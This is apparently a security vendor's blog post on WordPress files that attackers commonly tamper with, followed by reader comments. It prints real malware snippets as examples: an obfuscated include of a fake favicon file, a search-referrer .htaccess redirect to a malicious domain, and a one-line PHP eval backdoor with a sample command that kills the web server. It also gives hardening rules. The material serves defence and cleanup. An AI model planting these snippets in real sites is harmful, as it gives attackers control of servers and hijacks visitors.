WordPress has made building websites super easy and has enabled individuals and organizations of any size to have an online presence.
When hosting your WordPress website, taking care its security is essential. The last thing you want to happen is to wake up in the morning and find your website is hacked and all your development and SEO efforts went down in the drain with you having no knowledge of it 🙁
Because of its popularity, hackers tend to target WordPress along with its themes & plugins. If they find a vulnerability in one plugin, they would easily be able to exploit almost all the websites having that plugin installed.
Related Guide – WordPress Malware Removal
Take the recent vulnerability in Contact Form 7 plugin as an example. It is estimated that over 5 million websites using Contact Form WordPress plugin were left vulnerable after the vulnerability came to light. The flaws in the plugins allowed attackers to simply upload files of any type, bypassing all restrictions placed regarding the allowed upload-able file types on a website. Further, it allowed an attacker to inject malicious content such as web shells into the sites that are using the Contact Form 7 plugin version below 5.3.1 and have file upload enabled on the forms.
Similarly, there was an LFI vulnerability in the ‘Slider Revolution’ plugin which made it possible for hackers to download wp-config.php
from the vulnerable WordPress sites. This led to the leak of database credentials, encryption keys, and other sensitive configuration information about a website. This started being referred to as the wp-config.php hack.
In this guide, we’ll talk about all the important files and locations on your WordPress site that may have been a target of hackers & malware.
1) WordPress wp-config.php Hack
The wp-config.php
is an important file for every WP installation. It is the configuration file used by the site and acts as the bridge between the WP file system and the database. The wp-config.php
file contains sensitive information such as:
- Database host
- Username, password, & port number
- Database name
- Security keys for WordPress
- Database table prefix
Related Guide – Complete Step by Step Guide to WordPress Security (Reduce the risk of getting hacked by 90%)
Owing to its sensitive nature, it is a popular target amongst hackers. Last year, a critical flaw was found in the WP plugin Duplicator. There was Unauthenticated Arbitrary File Download vulnerability which let hackers download the wp-config file.
Once hackers get hold of the database login details via the wp-config.php
hack, they try to connect to the database and create fake WP admin accounts for themselves. This gives them full access to a website and the database. Sensitive data such as — user passwords, email ids, files, images, WooCommerce transaction details, and so on are exposed to the hacker. To have continued access to your WordPress site, they may also install scripts such as the Filesman backdoor.
2) WordPress index.php Hacked
The index.php
file is the entry point to every WordPress site. Since this gets to run with every page on your site, hackers inject malicious code which affects your whole website.
For instance, the pub2srv malware & Favicon malware hack target index.php
files. Researchers at Astra Security were monitoring this large spread malware redirection campaign, and saw that malicious code such as @include "\x2f/sgb\x2ffavi\x63on_5\x34e6ed\x2eico";
and the code in the screenshot below was added to the index.php files:
Some malware campaigns also rename the index.php
file to index.php.bak
and have caused the website to crash and not load at all.
Such malicious code in the index.php
file can cause website visitors to see strange popups, ads, or even being redirected to other spammy sites. To fix such a hack, compare the contents of this file with the original copy released by WordPress.
Related Guide – The Ultimate WordPress hack removal guide
3) WordPress .htaccess File Hacked
The .htaccess
file often found in your WordPress website’s home location, helps configure the server settings as per the website’s requirement. This is often found in Apache servers. The .htaccess
file is a very powerful component to control your web server’s performance and behavior. It can also be used to control the security of your website. Some common uses of the .htaccess
file are:
- Restrict access to certain folders of the site
- Configure the maximum memory usage of the site
- Create Redirects
- Force HTTPS
- Manage Caching
- Prevent a few script injection attacks
- Control maximum file upload sizes
- Stop bots from finding usernames
- Block image hotlinking
- Force automatic downloads of files
- Manage file extensions
However, when under attack, these features can be used to harvest clicks for the attacker. Often, the.htaccess
file is injected with malicious code to redirect users. Sometimes it is used to display spam to users. For instance look at the code given below:
RewriteEngine On
RewriteOptions inherit
RewriteCond %{HTTP_REFERER} .*ask.com.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*msn.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*bing.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*live.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*aol.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*altavista.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*excite.com*$ [NC,OR]
RewriteCond %{HTTP_REFERER} .*search.yahoo*$ [NC]
RewriteRule .* http://MaliciousDomain.tld/bad.php?t=3 [R,L]
The malicious code in the last line is redirecting the user traffic from the site. As a result, the users are redirected to http://MaliciousDomain.tld
. Then, it tries to load the bad.php
script. If you notice unusual redirect from your site, it is possible due to the .htaccess
file hack. However, if you don’t find the file, or if it’s empty – do not panic as this file is not mandatory (unless you are using pretty URLs in WordPress).
4) WordPress footer.php
& header.php
(WordPress Theme Files Hacked)
Each WordPress theme has a file called footer.php
and header.php
which has the code for the footer and header of the site. This area includes scripts & certain widgets which remain the same throughout the website. For example, the share widget or the social media widgets at the bottom of your website. Or at times it could be just copyright info, credits, etc.
So, these two files are important files that can be targeted by the attackers. It is often used for malware redirects and displaying spam content as was the case with the digestcolect[.com] Redirect Malware.
Hacked sites might contain gibberish code in these files as you can see in the screenshot below:
We decoded some of this and found hackers leveraging browser cookies to identify users and show them malicious advertisements etc.
Moreover, in another instance, the attackers injected JavaScript codes into all files with a .js extension. Because of the large scale infection, it often becomes difficult to clean such hacks.
5) WordPress functions.php Hacked
The functions file within the theme folder behaves as a plugin would. Which means, it can be used to add extra features and functionality to the WordPress site. The file functions.php
can be used for:
- Calling WordPress events/functions
- To call native PHP functions.
- Or to define your own functions.
The functions.php
file is present with every theme, but it is important to note that at any given time, only one functions.php
file is executed – the one in the active theme. Because of this, the functions.php
files were actively targeted by attackers in the Wp-VCD Backdoor Hack. This malware created new admins and injected spam pages in the site such as the Pharma and Japanese SEO spam.
<?php if (file_exists(dirname(__FILE__) . '/class.theme-modules.php')) include_once(dirname(__FILE__) . '/class.theme-modules.php'); ?>
As is evident from the code above, this file includes class.theme-modules.php file. This file is then used to install malware into other themes installed on your site (even if they are disabled). Thus creating new users and backdoors. This allowed attackers to access the site even after the file is cleaned up.
6) WordPress wp-load.php Hacked
The wp-load.php
is an important file for every WordPress site. The wp-load.php
file helps in bootstrapping the WordPress environment and gives plugins the ability to use the native WP core functions. Many of the malware variants infect WordPress sites by creating malicious wp-load files as was seen in the case of China Chopper Web shell malware. This typical behavior was to create files like wp-load-eFtAh.php
on the server. Since the name resembles the original file’s name, you may not have found it suspicious when logged in to FTP. These files would contain codes such as:
<?php /*5b7bdc250b181*/ ?><?php @eval($_POST['pass']);?>
This code allows the attacker to run any PHP code on the site which is sent by the hackers in the pass
parameter. Using this backdoor, harmful commands could be executed. For instance, the command — http://yoursite/your.php?pass=system("killall -9 apache");
could kill the webserver processes. This can shut down the entire server. Don’t judge this code by its length – it is dangerous enough to control your server remotely.
7) Flood of class-wp-cache.php Files on the Server
In one of the recent hacks, we’ve seen is cPanel and entire web server getting dozens or even thousands of class-wp-cache.php
files. Every folder of the website including the core files is infected with these malicious files. Usually, the cause of this infection is a vulnerability in the website code opening up an inlet for hackers.
How to Perform a WordPress Files Cleanup & Secure them
1) Cleaning files
Firstly, investigate the causes of attacks like the wp-config.php hack. Then remove the malicious/gibberish code. Secondly, restore the infected files from a backup that you may have. In case the backup is unavailable you can check out the original WordPress files in GitHub. Don’t forget to keep a backup of the files before you make any changes. Any mistake in the code removal process can potentially break your site.
2) Securing the site using plugins
With such hacks, core CMS files are often modified by hackers. It is important to check if any of your core WordPress files are modified. Astra Security customers already have this feature and are notified automatically if any such changes are detected.
Astra Security also provides an inbuilt review mechanism for reviewing these files changes.
After you’ve reviewed the changes in core system files, you would have to scan your site with a Malware Scanning solution such as Astra Website Protection to identify files with malicious content in them. Such tools give you a full scan report of the malware files, malicious links, reasons for the hack, etc.
3) Hide sensitive files
Exposing files to prying eyes can reveal sensitive info like we talked about the wp-config.php
hack in this article. Therefore, it becomes necessary to hide these files on the server. The .htaccess
file can help in securing these files.
To prevent anyone from accessing any PHP files in the wp-content/uploads
folder, you can create an .htaccess
file in the wp-content/uploads
folder and add the following code to it:
# Kill PHP Execution
<Files ~ ".ph(?:p[345]?|t|tml)$">
deny from all
</Files>
To hide sensitive files in the wp-includes
folder, add the following code to the .htaccess
file in the root of your site:
# Block wp-includes folder and files
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^wp-admin/includes/ - [F,L]
RewriteRule !^wp-includes/ - [S=3]
RewriteRule ^wp-includes/[^/]+\.php$ - [F,L]
RewriteRule ^wp-includes/js/tinymce/langs/.+\.php - [F,L]
RewriteRule ^wp-includes/theme-compat/ - [F,L]
</IfModule>
You can also choose to skip this entire process and just install the WP Hardening Plugin. This plugin hides sensitive files such as wp-contents, wp-uploads, etc. with just a toggle of a button. Adding to this WP-Hardening also helps in securing several other important security areas in your website, making it hard for attackers to identify sensitive information and exploit it.
Related Guide – Step by Step Guide to WordPress Malware Removal
4) Updating WordPress
Always keep your WP installation, its plugins, and themes up to date. A good number of the loopholes can be plugged by running an updated installation. Use the reputed plugins and themes only. Avoid poorly coded or nulled themes. This would keep attacks like the wp-config.php
hack at bay.
To explain this better, we created a complete step by step video to secure your WordPress site:
5) Use a WordPress Firewall
A firewall goes a long way in securing your site. A firewall can monitor the incoming traffic on your site and take preventive measures to block infection. It can effectively prevent attacks like the wp-config.php
hack. There are multiple cost-effective firewall solutions available in the market today. The one at Astra Security is flexible and suitable for your needs.
The Astra firewall stops attacks such as SQLi, code injection, XSS, CSRF, and 100+ other cyber threats in real-time. It also detects and blocks unusual and fake logins to your instance and scans your website automatically and regularly.
6) WordPress Security Audit or Pen testing
With WordPress being the most popular CMS in usage and thus a place for increased security issues, attackers are always on the prowl for exploitable vulnerabilities on WordPress websites. Consequently, Pen-Testing a WordPress site has become essential in order to keep it secure from attacks.
Penetration Testing is a simulated attack performed against a web application, network, or computer system to evaluate its security and find any vulnerabilities it has prior to an attacker thus helping in protecting it. One of the different simulated attacks carried out while Pen-Testing a WordPress site would be to check for Directory Listing vulnerability that basically indexes sensitive directories such as wp-includes, wp-index.php, wp-config.php, wp-admin, wp-load.php, wp-content, etc. and could thus provide an attacker with sensitive information.
Fix 12+ security issues with a click using our Free WP Hardening Plugin
Related Guide – Complete Step by Step Guide to WordPress Security (Reduce the risk of getting hacked by 90%)
Hello really post, please i have a question. How can i exploit a wordpress that wp-content/upload indexing is enabled?
Hello Hendrick! You can read this article for more information: https://www.getastra.com/blog/cms/wordpress-security/hide-wp-includes-wp-content-uploads-from-your-wordpress-site/
Hello,
I am not sure what’s going on, so im seeking your help.
When logging on through the admin panel, I am able to see my dashboard, however i am unable to edit or click on any other link within the dashboard, this give me a page not found message.
I’ve looked possible solutions such as updating the .htaccess file
From
<FilesMatch “.*\.(phtml|php)$”>
Order Allow,Deny
Deny from all
</FilesMatch>
<FilesMatch “(index).php$”>
Order Allow,Deny
Allow from all
</FilesMatch>
To
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ – [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
this did the trick, however the .htaccess file is overridden in a couple of minutes with the first part again. I’d like to not continue to modify the .htaccess file everytime i need to make a change to a post or view a plugin on the backend.
please help.